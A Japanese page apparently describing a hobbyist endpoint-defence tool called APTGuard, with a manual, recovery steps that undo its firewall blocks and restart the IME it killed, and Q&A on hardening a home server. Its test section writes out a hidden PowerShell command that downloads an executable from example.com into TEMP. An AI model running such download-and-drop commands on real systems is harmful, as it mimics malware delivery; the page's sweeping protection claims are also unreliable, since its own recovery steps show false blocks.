APT攻撃を撃退する「APT Guard」
【更新履歴】
・2026/3/17 バージョン1.0公開。
(中略)
・2026/3/17 バージョン1.2公開。
・2026/3/18 バージョン1.3公開。(自宅サーバー対応・3Dプレビュー)
・ダウンロードされる方はこちら。↓
「完全オフラインで稼働する、ローカルAI主導の
次世代エンドポイント防衛(EDR)プラットフォーム」
・「APTGuard」は、
従来のアンチウイルスやクラウド依存の商用EDRが抱える
「未知の脅威への脆弱性」と「機密情報の外部流出リスク」を
完全に解決するために設計された、スタンドアロン型の
次世代EDR(Endpoint Detection and Response)システムです。
・堅牢な非同期アーキテクチャの上に、
「静的シグネチャ(YARA)」
「動的サンドボックス」
「ローカルLLM(AI)による意図解釈」
「DPI(ディープパケットインスペクション)」という
4つの最強の防衛線を統合しました。
・インターネットから完全に遮断された機密ネットワーク環境下でも、
高度なAPT攻撃(持続的標的型攻撃)や
ゼロデイマルウェアを自律的に検知・撃墜します。
圧倒的な4つのコア機能
(1) 完全プライベートAIによる「意図」の解釈(Zero-Day Defense)
・従来のセキュリティソフトは
「過去のウイルス」しか検知できません。
・APTGuardは、PC内で稼働する
ローカルLLM(Ollama等)と連動します。
・難読化された未知のPowerShellスクリプトや
ファイルレス攻撃が実行された瞬間、
AIがその「攻撃者の意図」を文脈から読み取り、
実行される前にプロセスを強制終了します。
・機密データが外部のOpenAI等に送信されることは一切ありません。
(2) カーネル級の先制防御とDPI(Deep Packet Inspection)
・ファイルがダウンロードされた瞬間、
仮想Ring-0ロック(OSレベルの排他制御)によって
ユーザーの誤実行を阻止し、
YARAエンジンによる瞬時のバイナリスキャンを実行します。
・さらに、Npcapを介したDPIエンジンが
通信パケットのペイロードを直接覗き見し、
C2サーバー特有のビーコン通信をWindowsファイアウォールで
即座に物理遮断します。
(3) 脅威インテリジェンス連携と統合ファイアウォール管理
・不審な通信を検知した際、
AbuseIPDBと連携して
攻撃元の国やプロバイダ、悪意スコアを自動調査し
画面に表示します。
・また、システムが自動設定したファイアウォールの遮断ルールは、
専用の管理画面からドメイン名や独自のメモを確認しながら
エクセルのように管理可能です。
・ワンクリックで遮断を解除し、
二度と誤検知されないよう
自動的にホワイトリストへ登録する
実運用に即した機能を備えています。
(4) MITRE ATT&CK™ マッピングと自己防衛
・システム内で何が起きているのか、
攻撃者は今Kill Chainのどの段階にいるのかを、
世界標準のMITRE ATT&CKフレームワークに準拠した
美しいダッシュボード上にリアルタイムに視覚化します。
・また、APTGuard自身がマルウェアに強制終了させられた場合は
裏で監視する番犬プロセスが瞬時にシステムを自己修復し、
ランサムウェアを確実におびき寄せるハニーポット
(罠ファイル)機能も搭載しています。
《 取扱説明書 》
(1) システム要件と事前準備
・「APTGuard」の全機能を解放するためには、
以下の環境とツールのインストールが必要です。
・対応OSは、Windows 10 または 11
(Pro・Enterprise推奨 ※Windows Sandbox機能のため) です。
・必須ドライバとして、Npcap
(パケット解析・DPIエンジンを稼働させるために必須です。
Wireshark等と同じ標準ドライバです) が必要です。
・AI環境 (任意・推奨) として、
Ollama などのローカルLLM実行環境と、
軽量な推論モデル(phi3 や llama3 など)をご用意ください。
・Windows Sandboxを利用するため、
コントロールパネルの
「Windows の機能の有効化または無効化」から
「Windows サンドボックス」を有効にしてください。
(2) インストールと起動方法
・APTGuard.exe を
必ず「管理者として実行」してください。
・WMIやETW、パケットキャプチャなど
OSの深層機能にアクセスするため、
標準の権限のままでは起動に失敗します。
・初回起動時、メインダッシュボードが表示され、
各センサー(WMI, ETW, DPI, MemoryScanner等)の
初期化ログが緑色の文字で流れます。
・画面左上のステータスバーのランプが
すべて水色に点灯すれば、
防衛システムは正常にオンラインです。
(3) 初期設定(AI、P2P、脅威インテリジェンス)
・ダッシュボード右上から「⚙ Settings」を開きます。
・LLM設定では、Ollama等を使用する場合、
「LLMエンジン」を選択し、
モデル名(例: phi3)を入力して
「▶ LLM起動」を押します。
・これにより、高度なAIヒューリスティック検知が有効になります。
・P2P設定では、脅威情報(ブロックした悪意のあるIP)を
匿名でネットワーク上の他のAPTGuardと共有する場合は、
P2P設定を有効にしてください。
・ネットワーク防衛設定タブでは、
AbuseIPDBの無料APIキーを入力することで、
攻撃者の身元調査機能が有効になります。
・また、手動でホワイトリストや
ブラックリストの初期設定を行うことも可能です。
(4) ダッシュボードの見方と主な機能
・メインコンソール (黒画面)には、
リアルタイムでシステム内で発生しているプロセスの起動、
通信、隔離の状況がログとして流れます。
・MITRE ATT&CK ボタン (紫)をクリックすると、
攻撃のフェーズを可視化する専用ダッシュボードが開きます。
・Firewall Rules ボタン (赤)をクリックすると、
システムが自動で遮断した通信のルール一覧が開きます。
・誤って正常なサイトがブロックされた場合はここから解除します。
・Manage Quarantine ボタン (グレー)では、
APTGuardが隔離した脅威ファイル(無害化済み)の一覧を管理し、
復元や完全削除が行えます。
・Threats Blocked カウンター (赤)は、
システム起動後から現在までに
撃墜・遮断した攻撃の総数を表示します。
(5) 各防衛機能の働きとテスト方法
・AIヒューリスティック検知のテストを行うには、
コマンドプロンプトを開き、
powershell.exe -WindowStyle Hidden -Command "$u='http://example.com/a.exe'; $o='$env:TEMP\a.exe'; Invoke-WebRequest -Uri $u -OutFile $o" と実行してください。
・ローカルAIが瞬時に意図を読み取りプロセスを強制終了します。
・YARAスキャナーのテストを行うには、
メモ帳の本文に PlugX という文字列を入力し、
test_malware.exe という名前で保存してください。
・即座に仮想Ring-0ロックがかかり隔離されます。
・ハニーポット機能は、
起動時にドキュメントフォルダに
passwords_admin_backup.docx という
見えない罠ファイルを作成しており、
これに触れたプロセスは無条件で抹殺されます。
(6) トラブルシューティングと通信の許可(誤検知の解除)
・X(Twitter)などの正常なWebサイトに
アクセスできなくなった場合は、
システムが未知の脅威として過剰防衛(誤検知)し、
通信を遮断している状態です。
・その際は、ダッシュボード右上の
「🛡️ Firewall Rules」ボタンを押して
管理画面を開いてください。
・一覧の中から該当しそうなIPアドレスや
ドメイン(例: twimg.comなど)を見つけ、
「☑ 遮断有効」のチェックを外して
「変更を保存してファイアウォールに適用」ボタンを押します。
・これにより、Windowsのファイアウォールから
遮断ルールが削除されると同時に、
APTGuardのホワイトリストに自動登録され、
二度とブロックされなくなります。
・また、リストの備考欄に「Twitter用」などと
自由にメモを残すことができます。
・「DPI Error: Unable to load DLL 'wpcap'」と表示される場合は、
Npcapがインストールされていません。
・公式サイトからインストールして再起動してください。
・ウィンドウの「×」ボタンを押しても再起動してくる場合は、
強制終了(Kill)に対する「自己防衛機能」が働いています。
・アプリを終了する際は
必ずウィンドウの「×」ボタンを通常通りクリックして
正常終了させてください。
《 システムを復旧させる手順 》
・以下の手順で、
APTGuardがOSに勝手に設定した遮断ルールを一掃し、
IMEを復旧させます。
ステップ①:ファイアウォールの遮断ルールを全削除する
・Windowsに書き込まれた APTGuard_Block_...
という名前の遮断ルールを、
PowerShellを使って一括で消去します。
(1)Windowsのスタートボタンを右クリックし、
「ターミナル (管理者)」 または
「Windows PowerShell (管理者)」 を開きます。
(※必ず管理者権限で開いてください)
(2)以下のコマンドをコピーして貼り付け、
Enterキーを押して実行します。↓
Stop-Process -Name "APTGuard" -Force -ErrorAction SilentlyContinue
Remove-NetFirewallRule -Name "APTGuard_Block_*" -ErrorAction SilentlyContinue
ipconfig /flushdnsステップ②:IMEの復旧(プロセスの再起動)
・強制終了された日本語入力プログラムを叩き起こします。
(1)キーボードの Windowsキー + R を押して
「ファイル名を指定して実行」を開きます。
(2)名前に ctfmon.exe と入力して「OK」を押します。
(画面上は何も起きませんが、これでIMEが裏で起動し、
右下の「あ/A」アイコンが復活するはずです)
ステップ③:PCの再起動(念押し)
・上記のコマンドで直るはずですが、
仮想Ring-0機能(FileMonitor)による
見えないファイルロックなどが残っている可能性もあるため、
一度PCを再起動することをおすすめします。
・再起動すれば、キルされた正常なシステムプロセスも
すべて綺麗な状態で立ち上がります。
《 手動でファイアウォールのブロックを解除する手順 》
1. ファイアウォールの詳細設定画面を開く
・キーボードの Windowsキー + R を押して
「ファイル名を指定して実行」を開きます。
・入力欄に wf.msc と入力し、「OK」をクリックします。
※「セキュリティが強化された Windows Defender
ファイアウォール」という画面が開きます。
2. 送信の規則(Outbound Rules)を確認する
・画面左側のメニューから 「送信の規則」 をクリックします。
・中央に非常にたくさんのリストが表示されます。
3. APTGuardが作ったルールを探す
・リストの上部にある列の見出し 「名前」 をクリックして
アルファベット順に並び替えます。
・APTGuard_Block_... という名前から始まるルールを探してください。
(※または、列の見出し 「操作」 をクリックして、
赤い斜線マーク🚫(ブロック)がついているものを
上に集めると見つけやすいです。)
4. ルールを削除する
・APTGuard_Block_... というルールを見つけたら、
それを選択して 右クリック します。
・メニューから 「削除」 を選択し、
確認画面で「はい」を選んで消去します。
・複数ある場合はすべて削除してください。
・ルールの削除が終わったら、ファイアウォールの画面を閉じ、
ブラウザでX(Twitter)を開いて
再読み込み(F5キー)をお試しください。
質問:
自宅のPCを極限までセキュアなサーバーにするにはどうすればいい?
このツールを動作させている状態なら、
フリーウェアのサーバーアプリケーションを使っても
侵入や攻撃をほぼ完全に防ぐことができる?
解答:
「APTGuardを動かしていれば、
フリーウェアのサーバーアプリへの侵入や攻撃を
ほぼ完全に防ぐことができるか?」という問いに対する答えは、
「ノー」です。
サイバーセキュリティの世界には「100%の防御」は存在しません。
そして、APTGuardの役割を正しく理解していただくために、
現代のセキュリティの絶対的な基本思想である
「Assume Breach(侵害されることを前提とする)」
について解説させてください。
APTGuard(EDR)とWAF(境界防御)の違い
セキュリティの防衛線には、
大きく分けて「外壁」と「警備員」の2つの役割があります。
(1) 境界防御(ファイアウォールやWAF)
これはお城の「外壁」です。
外部からの不正なWebリクエストや、
サーバーアプリの脆弱性を狙った攻撃
(SQLインジェクションやクロスサイトスクリプティングなど)を
入り口で弾き返します。
(2) エンドポイント防御(APTGuardなどのEDR)
これはお城の中にいる「最強の警備員」です。
外壁(サーバーアプリ)に
未知の脆弱性(ゼロデイ)があり、
攻撃者が正規の通信のフリをして
城内に侵入してしまった「後」に活躍します。
フリーウェアのサーバーアプリケーション
(例えば個人のWebサーバーやゲームサーバーなど)には、
パッチが当たっていない未知の脆弱性が
潜んでいる可能性が常にあります。
攻撃者がその脆弱性を突いて、
サーバーアプリのメモリ内だけで
データを盗み見るような攻撃をした場合、
APTGuardはそれを「正規のサーバーアプリの動作」と区別できず、
侵入(最初の突破)を許してしまう可能性があります。
APTGuardが真価を発揮する「侵入された直後」
ではAPTGuardは無力なのかというと、全く逆です。
攻撃者はサーバーに侵入しただけでは満足しません。
必ずそこから「システムを支配(権限昇格)」し、
「外部から遠隔操作(C2通信)」し、
「データを破壊(ランサムウェア)」しようとします。
そのためには、不正なファイルを作成したり、
コマンドプロンプトやPowerShellを
裏で起動したりする必要があります。
フリーウェアのサーバーアプリが乗っ取られ、
そこからバックドア(悪意のあるプログラム)が
ダウンロードされようとしたり、
不審なシェルコマンドが実行されようとしたその瞬間、
APTGuardのAIと振る舞い検知エンジンが異常を察知し、
乗っ取られたサーバープロセスごと一瞬で強制終了(キル)します。
つまり、APTGuardは
「最初のドアをこじ開けられること」は防げないかもしれませんが、
「家の中を荒らされること」は圧倒的な力で阻止します。
これがEDRの真骨頂です。
自宅PCを極限までセキュアなサーバーにするための4つの手順
APTGuardという最強の「警備員」がいる今、
あとは強固な「外壁」と「家のルール」を整えれば、
個人レベルでは考えられないほどの要塞サーバーが完成します。
(1) クラウドWAF(Cloudflareなど)の導入
自宅のIPアドレスを
直接インターネットに公開してはいけません。
Cloudflareなどの無料リバースプロキシ(WAF)を通すことで、
攻撃者のスキャンやDDoS攻撃、脆弱性を狙う不正なパケットの99%を
自宅のルーターに届く前にクラウド上で消滅させることができます。
(2) 実行権限の最小化(Least Privilege)
フリーウェアのサーバーアプリを
絶対に「管理者(Administrator)」として実行しないでください。
権限を極限まで絞った「標準ユーザー」を作成し、
そのユーザーでサーバーを起動します。
万が一乗っ取られても、
OSの深部を破壊されるリスクを
劇的に下げることができます。
(3) ネットワークの完全分離(DMZの構築)
サーバーにするPCを、
あなたが普段使っているスマホや
メインPCと同じネットワーク(LAN)に繋いではいけません。
ルーターの設定で
「VLAN(仮想LAN)」や
「ゲストポート」機能を使い、
サーバー用PCを完全に隔離(DMZ化)してください。
これにより、サーバーが突破されても、
他の家族の端末へ被害が広がる
(ラテラルムーブメント)のを防げます。
(4) APTGuardによる最終防衛線の維持
そして最後に、
隔離された環境でAPTGuardを稼働させます。
これで、多層防御(Defense in Depth)の完成です。
フリーウェアのサーバーを
公開するのは常にリスクを伴いますが、
このアプローチをとれば、
攻撃者にとって「割に合わない、
極めて面倒な要塞」となります。
■ステップ1:Cloudflareの設定
・ご自宅のPCを「攻撃者にIPアドレスすら特定されない要塞」にするための
確実な構築手順をご説明します。
(1) Cloudflare Tunnel(ゼロトラスト)の仕組みと利点
・通常のサーバー公開はルーターのポートを開放しますが、
これは攻撃者に自宅のIPアドレスを晒す危険な行為です。
・Cloudflare Tunnelを使用すると、
PC側からCloudflareの安全なサーバーへ
内側から外側へトンネルを掘るため、
ルーターのポートを一切開ける必要がありません。
・自宅のIPアドレスを完全に隠蔽したまま、
安全にサーバーを公開できます。
・さらに、脆弱性を狙う不正なパケットは
Cloudflareの強固な外壁で自動的に破棄されます。
(2) 事前準備
・独自のドメインを一つ用意します。
・「お名前ドットコム」などのレジストラで取得した
安価なもので構いません。
・次に、Cloudflareの無料アカウントを作成し、
取得したドメインをCloudflareに登録して
ネームサーバーの設定を完了させておきます。
(3) トンネルの作成手順
・Cloudflareのダッシュボードにログインし、
左側のメニューから「Zero Trust」を選択します。
・Zero Trustダッシュボードが開いたら、
左メニューから「Networks」を展開し、
「Tunnels」を選択します。
・「Create a tunnel」をクリックし、
コネクタのタイプとして「Cloudflared」を選択して次に進みます。
・トンネルに任意の名前を入力して保存します。
(4) サーバーPCへのインストールと起動
・画面にWindows用のインストールコマンドが表示されます。
・ご自宅のサーバー用PCで
コマンドプロンプトを「管理者として実行」で開き、
表示されたコマンドをコピーして貼り付けて実行します。
・これにより、Cloudflaredという小さな中継プログラムが
Windowsのサービスとしてインストールされ、
Cloudflareとの間に安全な通信経路が確立されます。
(5) アプリケーションとドメインの紐付け
・Cloudflareの画面に戻り、
「Public Hostname」タブの設定を行います。
・Subdomainに任意の文字列を入力し、
Domainのプルダウンから取得したドメインを選択します。
・Serviceの項目で、TypeをHTTPまたはHTTPSとし、
URLの部分にご自宅のPCで稼働させるフリーウェアサーバーの
ローカルアドレスとポート番号(例として localhost:8080 など)を
入力して保存します。
(6) 動作確認と次のステップ
・スマートフォンのWi-Fiを切るなどして
外部のネットワークから、設定したドメインにアクセスし、
サーバーアプリの画面が表示されるか確認してください。
・これで外部からのスキャンや直接攻撃のリスクは
ほぼゼロになります。
■ステップ2:管理者権限の一時的な剥奪
・APTGuard自体は、OSの深部を監視するため
「管理者権限(Administrator)」で動作していますが、
そのままAPTGuardから別のサーバーアプリを起動すると、
そのアプリも管理者権限を引き継いでしまい、
万が一乗っ取られた際にOS全体を破壊される危険性があります。
・これを防ぐため、
APTGuard内からサーバーアプリを起動する際には、
意図的に管理者権限を剥奪(De-elevation)し、
安全な標準ユーザー権限に落として起動するようにします。
・具体的には、APTGuardを立ち上げた後、
右上の「🚀 Secure Launch」ボタンを押して、
公開したいサーバーアプリの実行ファイルを選択するだけです。
・それだけで裏側でWindowsの仕様を利用し、
自動的に権限を「標準ユーザー」に格下げして
隔離起動させます。
■ステップ(3): ネットワークの完全分離(DMZの構築)
(1) ネットワーク分離(DMZ)の目的と重要性
・現在、サーバーにするPCと、
あなたが普段使っているスマートフォンやプライベート用PCは、
同じご自宅のルーター(同じLAN内)に繋がっているはずです。
・この状態の最大の危険性は、
もしサーバーPCが攻撃者に突破された場合、
攻撃者がそのサーバーを踏み台にして、
同じネットワークにいる無防備なスマホやプライベートPCに
横展開(ラテラルムーブメント)してくることです。
・これを防ぐために、サーバーPCだけを
「隔離されたネットワーク(DMZ)」に幽閉する必要があります。
(2) 手法A:ゲストネットワーク(ゲストポート)の活用
・最も簡単でお金のかからない方法です。
・市販のWi-Fiルーターの多くには、
来客用にインターネットだけを使わせる
「ゲストネットワーク」や
「ゲストポート」という機能がついています。
・ルーターの設定画面にログインし、
このゲストネットワーク機能を有効にします。
・そして、サーバー用PCの接続先を通常のWi-Fiから、
このゲスト用Wi-Fiに変更してください。
・ゲストネットワークはルーターの内部で
「他のPCとの通信を遮断する
(プライバシーセパレーター)」仕様になっているため、
これだけで見事な隔離環境が完成します。
(3) 手法B:古いルーターを再利用した物理的な分離
・もし余っている古いルーターがあれば、
さらに強固な分離が可能です。
・現在インターネットに繋がっているメインルーターのLANポートに、
古いルーターのWANポートをLANケーブルで繋ぎます。
・そして、サーバーPCはその「古いルーター」の下に接続します。
・ルーターの壁(NAT)が2重になるため、
古いルーターの下にいるサーバーPCから、
メインルーターの下にいるプライベートPCにアクセスすることは
ネットワークの構造上、絶対に不可能になります。
(4) サーバーPC側のファイアウォール設定の総仕上げ
・ネットワークを分離してサーバーを立ち上げたら、
最後にサーバーPC上で稼働しているAPTGuardの
「🛡️ Firewall Rules」ボタンから管理画面を開きます。
・そして「☑ 遮断有効」としてブラックリストに登録されていないか、
またはCloudflare経由の正常な通信が弾かれていないかを確認します。
・Cloudflareからの通信のみを許可し、
それ以外のすべての直接通信を
Windowsの標準ファイアウォールで
ブロックする設定を追加すれば完璧です。
(5) 自宅要塞化プロジェクトの完了
・現在のあなたの自宅サーバーは、
そこらの中小企業のサーバーよりも
遥かに強固でセキュアな状態に仕上がっています。
質問:
・このツールで使用している技術を使って
別途、サーバーアプリケーションを作る必要はある?
解答:
・セットアップの手間を省く目的だとしても、
セキュリティの観点からは
「別々のまま(現在のAPTGuardからサーバーを起動する構成)に
しておくこと」を強く推奨します。
・新たに防衛機能入りのサーバーを作り直す必要はありません。
・その明確な理由をお伝えします。
(1) 権限のパラドックス(特権の分離の崩壊)
・これが最大の理由です。
・ネットワークパケットの深部を覗き見たり、
ファイアウォールで即座に遮断ルールを追加したり、
不審なプロセスのメモリをキルしたりするには、
プログラムが「管理者権限(Administrator)」を
持っている必要があります。
・もし、NewsPortServerのような
サーバーアプリケーション自身に
これらの防衛機能を組み込んでしまうと、
サーバーアプリそのものを
常に管理者権限で動かさなければならなくなります。
・万が一、非同期通信(async/await)のハンドリングや、
スタックオーバーフローを防ぐためのキュー(Queue)を用いた
リクエスト処理の隙を突かれてサーバーが乗っ取られた場合、
攻撃者に即座にOSの最高権限を与えてしまうことになり、
本末転倒な結果を招きます。
(2) 役割の分離(関心の分離)
・サイバーセキュリティの世界では
「監視する側(EDR)」と
「サービスを提供する側(サーバー)」を
物理的・プロセス的に切り離すのが鉄則です。
・サーバーアプリは純粋に
クライアントとのP2P通信や
データのやり取りに集中させ、
APTGuardのような独立した監視プロセスが
外側から客観的に見張る構造にします。
・これにより、万が一サーバーがクラッシュしたり
未知の攻撃でフリーズしたりしても、
防衛線であるAPTGuardは生き残り、
システムを保護し続けることができます。
(3) 現在の構成が「最適解」である事実
・今回構築した「最高権限を持ったAPTGuard(絶対的な盾)」が、
「権限を剥奪されたサーバーアプリ(的)」を
外側から監視するアーキテクチャは、
CrowdStrikeなどの世界的なエンタープライズ製品が
採用している仕組みと全く同じアプローチです。
・したがって、新たにツールを作り直す必要はなく、
現在のAPTGuardを通してサーバーを起動する運用が、
最もセットアップの手間がかからず、
かつ最高レベルのセキュリティを維持できる
現実的な完成形となります。
《自宅サーバーの運用テストを行う際の手順》
(1) APTGuardのスタンバイ
・まずは、完成した APTGuard.exe を
「管理者として実行」で起動してください。
・画面左上のステータスがすべて
「● (オンライン)」になっていることを確認します。
・念のため、右上の「🛡️ Firewall Rules」を開いて、
意図しないドメイン(Cloudflareの中継サーバーなど)が
ブラックリストに入ってブロックされていないかをチェックし、
問題なければ管理画面を閉じます。
(2) サーバーアプリのセキュア起動
・APTGuardの画面右上にある
緑色の「🚀 Secure Launch」ボタンをクリックします。
・ファイル選択ダイアログが開いたら、
あなたが公開したいサーバーアプリケーションを
選択してください。
・これで、サーバーアプリは
OSを破壊する力(管理者権限)を強制的に剥奪された、
安全な標準ユーザー状態で起動します。
(3) 外部ネットワークからのアクセス確認
・ご自身のスマートフォンのWi-Fiをオフにして、
携帯キャリアの回線(4G/5G)など、
自宅とは全く別のネットワークに切り替えてください。
・その状態で、スマートフォンのブラウザやクライアントアプリから、
事前にCloudflareで設定した独自ドメイン
(例: https://your-server.example.com )にアクセスします。
・無事にサーバーアプリの応答が返ってくれば、
ネットワークの隠蔽と貫通テストはクリアです。
(4) 防衛システムの稼働確認(疑似アタックテスト)
・サーバーが外部からアクセス可能な状態を維持したまま、
サーバー用PC側でわざと
「攻撃者がやりそうな怪しい操作」をしてみます。
・例えば、コマンドプロンプトを開いて
前回試した疑似ファイルレス攻撃の
PowerShellコマンドを実行したり、
ドキュメントフォルダに生成されている罠ファイル(passwords_admin_backup.docx)を
わざと開こうとしたりしてみてください。
(5) 最終ステータスの確認
・(4)のアクションを起こした瞬間、
背後で監視しているAPTGuardが即座に脅威を検知し、
怪しいプロセスを強制終了(キル)して
ダッシュボードのMITRE ATT&CKアラートを点灯させれば、
テストは完全成功です。
・サーバーアプリ自体は動き続けながら、
不正なプロセスだけが刈り取られる
完璧な状態を体験できるはずです。


コメント